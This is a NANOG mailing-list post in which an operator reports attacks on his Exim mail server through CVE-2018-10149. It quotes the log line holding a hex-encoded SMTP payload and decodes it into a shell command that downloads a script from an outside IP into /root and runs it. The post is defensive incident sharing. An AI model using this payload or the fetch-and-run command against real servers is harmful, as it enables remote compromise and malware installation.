Russian Anal Probing + Malware
Andy Smith
andy at strugglers.net
Sun Jun 23 04:04:13 UTC 2019
Hello,
On Sat, Jun 22, 2019 at 11:01:13AM -0600, Keith Medcalf wrote:
> What malware slinging?
Some user there is trying to exploit CVE-2018-10149:
2019-06-11 11:28:35 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "RCPT TO:<bin+${run{\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22}}@myhostname>" H=(myhostname) [89.248.171.57] next input="QUIT\n"
Plus another 17 attempts by that IP through to 19 June.
$ printf "\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22\n"
/bin/sh -c "wget --no-check-certificate -T 36 hxxps://185.162.235.211/ldm1ip -O /root/.yyearz && sh /root/.yyearz -n &"
(I replaced https with hxxps to prevent auto-link-followers from
hitting the site.)
Cheers,
Andy
More information about the NANOG
mailing list